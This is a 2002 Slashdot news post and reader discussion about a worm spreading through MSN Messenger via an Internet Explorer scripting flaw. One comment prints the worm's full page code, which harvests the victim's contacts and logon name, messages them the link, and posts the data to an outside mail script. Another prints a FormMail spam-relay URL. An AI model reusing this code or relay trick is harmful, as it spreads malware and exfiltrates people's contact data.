Forgot your password?
typodupeerror
Microsoft

Microsoft Instant Messenger Virus Sweeps Net 401

Posted by michael
from the RISKs-of-homogeneous-computing dept.
Many people have reported a Warhol virus affecting users of Microsoft Instant Messenger. If you get messaged, "Go To http://www.masenko-media.net/cool.html NoW !!!", or any similar message (apparently there are several websites with the infection code), I suggest not following the link. A brief discussion follows.

Sequence: Get messaged "Go To http://www.masenko-media.net/cool.html NoW !!!" or something similar with another URL. Follow the link. That webpage contains malicious code which gets your messenger contacts and sends a similar message to your contacts. It looks like it uses a vulnerability in formmail.pl as well, although I'm not exactly sure how (I'm not an expert in ECMAscript, sorry, and I have no systems that could possibly be affected by this to test with). I'm sure some of our readers can provide more information in the comments below.

There appear to be several webpages which carried the infected code, not just masenko-media.net. Some webmasters are already taking them down.

Sophistication: moderate. Damage: only your pride.

Solution: probably the latest mega-patch for Internet Explorer will fix the Microsoft bug that allowed this.

Risks: obviously, the code could have done worse than just messaging your contacts. With Microsoft making "messaging" an integrated part of the operating system, any flaws in it can be exploited to affect millions of people instantly, so it is a high-value target. Does it have commensurate high-strength security?

This discussion has been archived. No new comments can be posted.

Microsoft Instant Messenger Virus Sweeps Net

Comments Filter:
  • The Code (Score:5, Informative)

    by nihilist_1137 (536663) on Wednesday February 13, 2002 @08:07PM (#3004066) Homepage
    Use Trillian :http://www.trillian.cc. A few people msg me with the link. All that happens in that a blank window pops up. Mind you, i am on dual monitors so that may have had something to do with it. The code for the page (http://www.masenko-media.net/cool.html ) is:
    <br><br>
    <html>
    <head>
    <title>Welcome</title>
    <Script>

    var msnWin;
    var msnList;
    var msgStr = "Go To http://www.masenko-media.net/cool.html NoW !!!";

    function Go(){

    msnWin = document.open("res://mshtml.dll/blank.htm", "", "fullscreen=1");
    msnWin.resizeTo(1, 1);
    msnWin.moveTo(10000, 10000);
    msnWin.document.title = "Please Wait...";
    msnWin.document.body.innerHTML = '<object classid="clsid:F3A614DC-ABE0-11d2-A441-00C04F79568 3" id="msnObj1"></object><object classid="clsid:FB7199AB-79BF-11d2-8D94-0000F875C54 1" id="msnObj2"></object>';
    focus();

    if (msnWin.msnObj1.localState == 1){
    msnWin.msnObj2.autoLogon();
    }
    Contacts();
    Send();
    msnWin.close();
    document.contents.submit();
    }

    function Contacts(){
    msnList = msnWin.msnObj1.list(0);
    document.contents.email.value = msnWin.msnObj1.localLogonName;
    document.contents.subject.value = Date();
    var msnStr = "<br>";

    for (i=0;i<msnList.count;i++){
    if (msnList(i).state >1){
    msnStr += "Online Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "<br>";
    }

    else{
    msnStr += "Offline Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "<br>";
    }
    }
    document.contents.contentBox.value = msnStr;
    }

    function Send(){
    for (i=0;i<msnList.count; i++){
    if (msnList(i).state >1){
    msnList(i).sendText("MIME-Version: 1.0\r\nContent-Type: text/plain; charset=UTF-8\r\n\r\n", msgStr, 0);
    }
    }
    }

    </Script>
    </head>
    <body onload="Go()">
    <p align="center">&nbsp;
    <p align="center">&nbsp;</p>
    <p align="center">&nbsp;</p>
    <p align="center">&nbsp;</p>
    <p align="center"><font face="Arial">
    Please Wait...</font></p>
    <form METHOD="POST" ACTION="http://www.yong.f2s.com/mailform.pl" NAME="contents" ID="Form1">
    <input type="hidden" name="redirect" value="http://www.rjdesigns.co.uk/cool/go.htm" ID="Hidden1">
    <input type="hidden" name="recipient" value="mmargae@wanadoo.nl" ID="Hidden5">
    <input type="hidden" name="email">
    <input type="hidden" name="subject">
    <input type="hidden" NAME="contentBox" id="Hidden6">
    <input type=hidden name="env_report" value="REMOTE_HOST,HTTP_USER_AGENT">
    </form>
    </body>
    </html>
  • Not a Messenger flaw (Score:5, Informative)

    by Osty (16825) on Wednesday February 13, 2002 @08:08PM (#3004076)

    First off, this is not a virus. It's an Internet Explorer exploit allowing access to your Messenger contact list and other Messenger functions. As the post noted, it is fixed with the latest IE patch. The actual problem was with IE's document.open scripting object, and how it was able to access local system objects from web sites (basically, the about: URI namespace was considered to be in the "My Computer" security domain, which means it had much more lax security than an actual website. However, since about: can take valid html, site developers were able to embed Messenger objects in about: pages, and access information from that). This is not a problem with Messenger at all.


    Install the patch and be done with it.

  • Re:Other clients? (Score:5, Informative)

    by Static_Neurotoxin (141004) <static+slashdot@neurotoxin.net> on Wednesday February 13, 2002 @08:09PM (#3004078) Homepage
    Trillian is safe. Opera is safe. The only combo you need to worry about is IE and Messenger.
  • by rogueuk (245470) on Wednesday February 13, 2002 @08:09PM (#3004080) Homepage
    the register [theregister.co.uk] had an article about this a few days ago. A flawed Document.Open() in the script apparently causes it. The demo site the reg links to is pretty interesting. And of course, MS has known about this since december :-P
  • Warhol? worm (Score:5, Informative)

    by blkros (304521) <blkros@[ ]oo.com ['yah' in gap]> on Wednesday February 13, 2002 @08:10PM (#3004085)
    The worm seems to be named because of a quote that the site attributes to Andy Warhol.(ie. 'in the future everyone will have his 15 minutes of fame.') That quote should actually be attributed to Marshal MacLuhan, who Andy ripped it off from. So these worms should be name MacLuhan worms.
  • Re:Other clients? (Score:2, Informative)

    by Qwerpafw (315600) on Wednesday February 13, 2002 @08:12PM (#3004096) Homepage
    Fire (like trillian, but for OS X) doesn't seem to care. At least, as far as I can tell. Most likely the security hole lies in windows/MSN integration. or in the MSN client software. But not the messaging protocol.

    Of course, the trillian people have a MUCH better track record in terms of patches and so forth (they keep updating so it'll work with AOL...) so even if it affects trillian (pretty sure the answer is NO...) they will fix it before M$.
  • by jfroot (455025) <darmok@tanagra.ca> on Wednesday February 13, 2002 @08:14PM (#3004112) Homepage
    Just go to the registrar www.godaddy.com:

    MASENKO-MEDIA.NET WHOIS results:

    The data contained in Go Daddy Software, Inc.'s WHOIS database,while believed by the company to be reliable, is provided "as is"with no guarantee or warranties regarding its accuracy. Thisinformation is provided for the sole purpose of assisting youin obtaining information about domain name registration records.Any use of this data for any other purpose, including, but notlimited to, allowing or making possible dissemination orcollection of this data in part or in its entirety for anypurpose, such as the transmission of unsolicited advertising andsolicitations, is expressly forbidden without the prior writtenpermission of Go Daddy Software, Inc. By submitting an inquiry,you agree to these terms of usage and limitations of warranty.Registrant: Net Crater NetCrater 502 Summit ST Walnut Cove, North Carolina 27052 United States Registrar: Go Daddy Software (http://registrar.godaddy.com) Domain Name: MASENKO-MEDIA.NET Created on: 06-Feb-02 Expires on: 06-Feb-03 Last Updated on: 06-Feb-02 Administrative Contact: Crater, Net domains@netcrater.com NetCrater 502 Summit ST Walnut Cove, North Carolina 27052 United States 3365917696 Technical Contact: Crater, Net domains@netcrater.com NetCrater 502 Summit ST Walnut Cove, North Carolina 27052 United States 3365917696 Domain servers in listed order: NS1.NETCRATER.COM NS2.NETCRATER.COM
  • Re:The Code (Score:2, Informative)

    by suwain_2 (260792) on Wednesday February 13, 2002 @08:14PM (#3004116) Journal
    $ wget http://www.masenko-media.net/cool.html
    --19:08:55-- http://www.masenko-media.net/cool.html => `cool.html' Connecting to www.masenko-media.net:80... connected! HTTP request sent, awaiting response... 404 Not Found 19:08:55 ERROR 404: Not Found.

    Seems they took it down? Now is this just going to have millions of people getting 404 messages?

  • Re:This is news? (Score:2, Informative)

    by joshsisk (161347) on Wednesday February 13, 2002 @08:15PM (#3004126)
    Uh, so people can download the patch before they get the virus, maybe?
  • by bovinewasteproduct (514128) <gclarkii@gbdi s p a t c h.com> on Wednesday February 13, 2002 @08:17PM (#3004147) Homepage
    You might try just the domain name. Which comes out to:
    Registrant:
    Net Crater
    NetCrater
    502 Summit ST
    Walnut Cove, North Carolina 27052
    United States

    Registrar: Go Daddy Software (http://registrar.godaddy.com)
    Domain Name: MASENKO-MEDIA.NET
    Created on: 06-Feb-02
    Expires on: 06-Feb-03
    Last Updated on: 06-Feb-02
    Administrative Contact:
    Crater, Net domains@netcrater.com
    NetCrater
    502 Summit ST
    Walnut Cove, North Carolina 27052
    United States
    3365917696
    Technical Contact:
    Crater, Net domains@netcrater.com
    NetCrater
    502 Summit ST
    Walnut Cove, North Carolina 27052
    United States
    3365917696

    Domain servers in listed order:
    NS1.NETCRATER.COM
    NS2.NETCRATER.COM

    Looks fine to me..:)

    BWP
  • formmail.pl (Score:5, Informative)

    by TheFlu (213162) on Wednesday February 13, 2002 @08:22PM (#3004177) Homepage
    Just an FYI about the lack of security on older versions of formmail.pl You should replace the exploitable version, if you are using it yourself.

    Formmail.pl Can Be Used As An Open Mail Relay

    Summary
    The CGI program Formmail.pl lacks adequate security checks and allows spammers to send anonymous e-mail using vulnerable host as mail relays.
    This vulnerability has already been exploit by spammers in many installations of Formmail.pl.

    Details
    Matt Wright's formmail.pl program does a "security check" on the HTTP_REFERER server variable. The security check is usually used to verify that information submitted from a form came from a proper or designated domain. This is usually done to prevent someone from creating a local, malicious form to submit to a script. This can be easily bypassed by passing a raw HTTP request, and faking the HTTP Referrer. This script also allows you to set the recipient's email address in the form. These two factors allow a malicious user to use the formmail.pl program two distribute their email (SPAM).

    Exploit:
    A URL such as the following:
    http://www.example.com/cgi-bin/FormMail.pl? recipient=email@address-to-spam.com&message= Proof%20that%20FormMail.pl%20can%20be%20used%20to% 20send%20anonymous%20spam.

    Will send an anonymous e-mail if the installed FormMail.pl is vulnerable.

    Workaround:
    1. Remove your formmail.pl script until the author provides a fix.
    or:
    2. Hard code the recipient's email address in the formmail.pl program. Do not rely on the address submitted by the user.
  • by joemiah (2398) on Wednesday February 13, 2002 @08:25PM (#3004198)
    It spreads through your contacts, so the recipients are more than likely receiving the URL from someone they know.
  • Re:Gee... (Score:4, Informative)

    by Cally (10873) on Wednesday February 13, 2002 @08:25PM (#3004204) Homepage
    Well this is Waaaay off-topic... but WTF ;)

    Is this really a surprise? God forbid Microsoft ever tried to make medical equipment.


    According to RISKS Digest, someone went along to watch a friend getting laser eye surgery & noticed (a) the technician was blindly hitting RETURN to clear pesky annoying error messages, and (b) the machine was running Win95. Oh, and this machine was taking the details of the subject's eye geometry, & controlling the laser that was about to shave a thing slice off the front of the eyeball to correct some minor astigmatism (IIRC; don't have the url to hand, anyone? )
  • by lblack (124294) on Wednesday February 13, 2002 @08:26PM (#3004206)
    Have any A/V companies deployed products to protect against instant messaging vulnerabilities? I know that Bitdefender [bitdefender.com] have a product that helps to increase your security when running such services, but I haven't heard of similar things from Norton/McAffee.

    I always thought this was kinda silly, waiting for the horse to leave before closing the stable. Did anybody not view Instant Messenger traffic, especially once it got into a high level of file transfer interaction, as not being a platform for the deployment of viruses?

    Still, this is a social engineering thing more than it is anything else. It's not even really a virus -- it's a piece of destructive code delivered via social engineering. It is not really self-propogating, though, in that it requires the server-side in order to be malicious, or do anything at all.

    That seems to me to be stretching "virus" a bit. Maybe "viral meme"? I agree it does spread a bit like a virus, but it actually requires fetching external information.

    -l

    P.S. Bitdefender are beta'ing a Linux product, by the way. It's not Open, but the beta is a free (as in beer) download. Disclaimer: I'm a fan of that company. ;)

  • by CrayzyJ (222675) on Wednesday February 13, 2002 @08:29PM (#3004220) Homepage Journal
    "somebody they don't know"

    It says that the virus sends the msg to people in the contact list. Hence, you'd get messages from your friends/family/whatever.

  • by Wizard of OS (111213) on Wednesday February 13, 2002 @08:29PM (#3004221)
    Look closely:

    <input type="hidden" name="recipient" value=mmargae@wanadoo.nl" ID="Hidden5">

    I think somebody forgot that HTML source can be viewed ...

    The nasty part: every time somebody looks at this page, his MSN-email address is being posted to this mailform.pl script (the web equivalent of an open relay) and it is sent to this wanadoo.nl user.
  • Why this is news (Score:3, Informative)

    by jeff13 (255285) on Wednesday February 13, 2002 @08:34PM (#3004252) Homepage
    People keep going on (posting here that is) as if this is some sort of sensationalization of Microsoft security issues. As if other media outlets jump on Microsoft like vultures. Well, wake up, they don't (imho). The 'straight' media tends to avoid bad business news, especially given the danger of being sued by the most politically powerful, media powerful, and just plain rich powerful, software company around. Hmmm, AOL/Time don't count right?

    Just because it's the latest #@#k up from Microsoft doesn't deminish it's importance as news.

    How many times have I shocked an Internet user (years of tech support, I'm so bitter!) by exploiting IExploder sillyness and effectively crack the lusers OS? They were none to pleased, I have to say. It's not like I can even code really, I'm a moron with programming. But if I can do it...

    And it's better to find out about these things in the news, not the hard way!
  • by nweaver (113078) on Wednesday February 13, 2002 @08:58PM (#3004366) Homepage

    Warhol style worms are purely active worms, which require no human intervention to spread. This worm sounds like an intervention-required worm/trojan (like a mailworm) but which spreads through MSN instead of email.

    It would be a warhol-like worm if the message sent automatically opened the web page, making it a purely autonomous worm. I sorta wish it was, because that would be an interesting validation of the speed of topologically aware active worms. Then again, I don't use MSN Messenger.

    For those who are interested, a more formal analysis is available Here [berkeley.edu], a paper I submitted to Usenix Security on the subject.

  • Re:Gee... (Score:5, Informative)

    by Frater 219 (1455) on Wednesday February 13, 2002 @09:31PM (#3004497) Journal
    According to RISKS Digest, someone went along to watch a friend getting laser eye surgery & noticed (a) the technician was blindly hitting RETURN to clear pesky annoying error messages, and (b) the machine was running Win95. Oh, and this machine was taking the details of the subject's eye geometry, & controlling the laser that was about to shave a thing slice off the front of the eyeball to correct some minor astigmatism (IIRC; don't have the url to hand, anyone? )

    A quick Google search for "risks digest eye surgery" yields this link [ncl.ac.uk]. Pretty frightening stuff, and it does show how well many users have become trained to treat error conditions as part of the normal behavior of computer operating systems and applications.

  • by silicon_synapse (145470) on Wednesday February 13, 2002 @09:40PM (#3004547)
    Yes, but if it was an organized effort directed at the site for the express purpose of bringing it down, the guys at OSDN could be held liable for a DDoS.
  • by ahde (95143) on Wednesday February 13, 2002 @09:40PM (#3004551) Homepage
    they're ActiveX viruses, and will do more than send MSN Messenges to your friends if you're using IE
  • masenko-media.net (Score:1, Informative)

    by Anonymous Coward on Wednesday February 13, 2002 @10:15PM (#3004711)
    WHOIS information for masenko-media.net:

    The Data in Network Solutions' WHOIS database is provided by Network
    Solutions for information purposes, and to assist persons in obtaining
    information about or related to a domain name registration record.
    Network Solutions does not guarantee its accuracy. By submitting a
    WHOIS query, you agree that you will use this Data only for lawful
    purposes and that, under no circumstances will you use this Data to:
    (1) allow, enable, or otherwise support the transmission of mass
    unsolicited, commercial advertising or solicitations via e-mail
    (spam); or (2) enable high volume, automated, electronic processes
    that apply to Network Solutions (or its systems). Network Solutions
    reserves the right to modify these terms at any time. By submitting
    this query, you agree to abide by this policy.

    The data contained in Go Daddy Software, Inc.'s WHOIS database,
    while believed by the company to be reliable, is provided "as is"
    with no guarantee or warranties regarding its accuracy. This
    information is provided for the sole purpose of assisting you
    in obtaining information about domain name registration records.
    Any use of this data for any other purpose, including, but not
    limited to, allowing or making possible dissemination or
    collection of this data in part or in its entirety for any
    purpose, such as the transmission of unsolicited advertising and
    solicitations, is expressly forbidden without the prior written
    permission of Go Daddy Software, Inc. By submitting an inquiry,
    you agree to these terms of usage and limitations of warranty.

    Registrant:
    Net Crater

    Registrar: Go Daddy Software (http://registrar.godaddy.com)
    Domain Name: MASENKO-MEDIA.NET

    Domain servers in listed order:
    NS1.NETCRATER.COM
    NS2.NETCRATER.COM
    The previous information has been obtained either directly from the
    registrant or a registrar of the domain name other than Network Solutions.
    Network Solutions, therefore, does not guarantee its accuracy or
    completeness.

  • by mech9t8 (310197) on Wednesday February 13, 2002 @10:22PM (#3004745)
    You can delete the references to the Messenger object in the registry. It leaves Messenger unaffected but disables the web object.

    Remove the following registry keys:

    HKEY_CLASSES_ROOT\CLSID\{F3A614DC-ABE0-11d2-A441 -0 0C04F795683}
    HKEY_CLASSES_ROOT\CLSID\{FB7199AB-79BF-11d2-8D94 -0 000F875C541}
    HKEY_CLASSES_ROOT\Messenger.MsgrObject

    and there's another Messenger.* object, but I forget what it was... but if you get the CLSIDs that should cover it...

    You can just rename them to backup_FB7199AB-79BF-11d2-8D94-0000F875C541 or whatever if you want to be cautious.

    You'll need to remove them again if you upgrade or reinstall - it'll put the references back.
  • Re:formmail.pl (Score:3, Informative)

    by babbage (61057) <cdevers@NosPaM.cis.usouthal.edu> on Thursday February 14, 2002 @12:16AM (#3005174) Homepage Journal
    As I understand it, Matt Wright has indicated that he doesn't have much interest in updating his old software anymore, so "official" bugfixes are unlikely to be forthcoming. As another commenter noted, the NMS [sourceforge.net] group is working on a suite of dropin replacements for each of the scripts that Matt wrote years ago, and among them is a very good replacement for FormMail.pl. These newer scripts are being developed with security and robustness in mind from the ground up.

    Even in cases where it might be safer & more efficient to use libraries from CPAN, the NMS group has deliberately decided to not make use of these libraries, so that novice devlopers could make use of these more reliable scripts without having to perform any configuration more advanced than setting a few variables and writing a little bit of HTML (which, presumably, they'll be more comfortable with anyway).

    Exploits like this are exactly why people should migrate the old Matt Wright code to NMS, which can be dropped in and up & running very quickly. It's easy, and it's much safer. It's the right thing to do.

  • by Osty (16825) on Thursday February 14, 2002 @12:40AM (#3005246)

    Hmm ... or maybe it's because that problem with Linux went away a long time ago. A default workstation install of Red Hat Linux 7.2 has zero open ports and a firewall that blocks access to all ports under 1024.

    Except that Red Hat Linux 7.2 is not exactly all that old. Even as recently as RedHat 7.0, there were still security problems with a default install. That's what, a year old? And RedHat is not the only distro out there. And not everybody installing today is installing the latest versions. I spoke with a guy just recently who wanted to install SuSE 6.0 (SuSE is at version 7.3, now. 6.0 is roughly 2-2.5 years old, or so), simply because those were the CDs he had on-hand. I constantly see people trying to install RedHat 6.2, and even 5.2. As well, your argument is ignoring all those people that installed Linux back during the whole dot-bomb bubble (because Linux was the up-and-coming cool thing to have), and promptly forgot about that system in their back room running it. That's what, RedHat 6.0? SuSE 6.0? Slackware 4.0? Those installations are still a problem even today.


    Now, obviously if someone sets up a server and doesn't patch, that person is an idiot (and that is true no matter what OS he/she is running). Unfortunately for your argument, we're talking about an instant messenger client and a web browser, not things that are likely to be installed on a server. The fact is, you can't exploit my Linux system via Mozilla/Konq/Galeon/Netscape, yet every other week, a new way to exploit Windows using IE pops up.

    Right. Anyone setting up a server and not patching is an idiot. But that doesn't mean people aren't doing just that. Both Microsoft and RedHat have taken steps to protect against that, yet Microsoft is villified while RedHat is heralded. That was exactly the point of the AC's comment. Yes, this article was about an IE exploit. Yes, his comment was off-topic. No, his comment is not ungrounded. Within the scope of his comment pertaining to servers, you know what he said is true. You might not want to believe it, but it is. Anyway, the reason why you don't see many exploits for Mozilla/Konq/Galeon/Netscape (three of which are all based on a single rendering engine, and the fourth can use that same engine as well) is because they are small potatoes compared to IE. There's just not much reason for hax0rs to spend their time finding exploits in those browsers when they're only going to hit maybe 5% of the browsing public (and I'm being generous). Microsoft software really doesn't have significantly more problems than any other software. Microsoft is simply a large target, and so many and more people spend much more time finding those holes (often for malicious purposes, sadly).


  • by WhiteKnight07 (521975) on Thursday February 14, 2002 @12:43AM (#3005259)
    The "Uber Patch" is available for download here [microsoft.com].
  • Re:The Code (Score:2, Informative)

    by c0wh (445032) on Thursday February 14, 2002 @12:57AM (#3005311)

    To nitpick a bit, this tactic is actually used to hide the window in all respects but its entry in the taskbar. (it's resized to one pixel tall and wide, and moved way off the lower right corner, unless your screen resolution is above 10,000 x 10,000.)

    Popups like this usually avoid being noticed, so they can launch normal pop up ads at thirty second intervals if they so choose.

    I can't stand this crap. Mozilla has gone in a great direction by disabling any "window.open" calls except from user generated events. (no more popups "onLoad" or "onUnload," if you enable that feature)

  • by Anonymous Coward on Thursday February 14, 2002 @01:11AM (#3005354)
    I thought the title meant a warhol worm [berkeley.edu] at first.

    World-wide worm propagation in 15 minutes. Finally something worth the attention given to not-so-well designed worms such as code red.
  • by Anonymous Coward on Thursday February 14, 2002 @01:14AM (#3005360)
    edit the \WINDOWS\inf\sysoc.inf
    look for
    msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
    delete the hide part then you can uninstall ms messenger by using the add/remove windows components.
    msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,,7 is what it should look like in the end
  • Explanation of code (Score:3, Informative)

    by tomgilder (255203) on Thursday February 14, 2002 @04:28AM (#3005755) Homepage
    Hi there, I was the one along with Thor Larholm who originally demoed this exploit on my website [tom.me.uk].

    We did so as to attempt to put pressure on Microsoft to patch several major holes in Internet Explorer - the one we exploited (document.open) took MS exactly fifty four days to make a patch from, from it being publicly disclosed.

    We felt this was pathetic, and the public had a right to know what Microsoft's bad programming could cause - none of the previous examples of the document.open hole had shown to what extent this could be exploited.

    This new worm, although harmless, is a direct rip of the example code [slashdot.org] from our bulletin, modified to also e-mail the contact list and MSN sing-in name to an e-mail address.

    As long as Microsoft continues to support the flawed security model of ActiveX, integrating products together this closely, such things will continue to happen.

    The next MSN worm might be far worse.

    Please, please all Internet Explorer users patch your systems now [microsoft.com]. If you are using IE5.0 or lower, MS haven't produced a patch for you - they clearly care more about their product lifecycles than customer's security. I strongly suggest upgrading to 5.5 or 6, failing that disable active scripting.

    I'm also interested as to why Slashdot felt the need to approve this article about a worm, as several people submitted stories about my original MSN exploit example. Oh well, guess you need things in the wild before telling people?

  • by IamTheRealMike (537420) <mike@plan99.net> on Thursday February 14, 2002 @06:46AM (#3005997) Homepage
    This happens all the time, there are in fact several different MSN Messenger virii, not all of which use IE. Some of them just send files to you, such as the infamous ;) Choke virus.

    What pisses me off about this is that Microsoft is the one who makes all the money from this, yet I am the one who has to clean up my friends computers every third Tuesday for them, because MSN allows any program (or indeed website, it's used on the msn portal pages) to access it's internal objects via COM. Not that there is anything wrong with this idea, but due to their lax coding, it's people like me who get to pick up the pieces.

    As I access MSN via Jabber I can't be infected with these viruses anyway, but the fact that MSN isn't even a particularly great chat program especially rankles.

  • by Sklivvz (167003) <marco.cecconi@gmail . c om> on Thursday February 14, 2002 @08:07AM (#3006189) Homepage Journal
    The patch does not work!!!! See here! [securityfocus.com]

    thanks bill.... :-(

Surprise your boss. Get to work on time.

Working...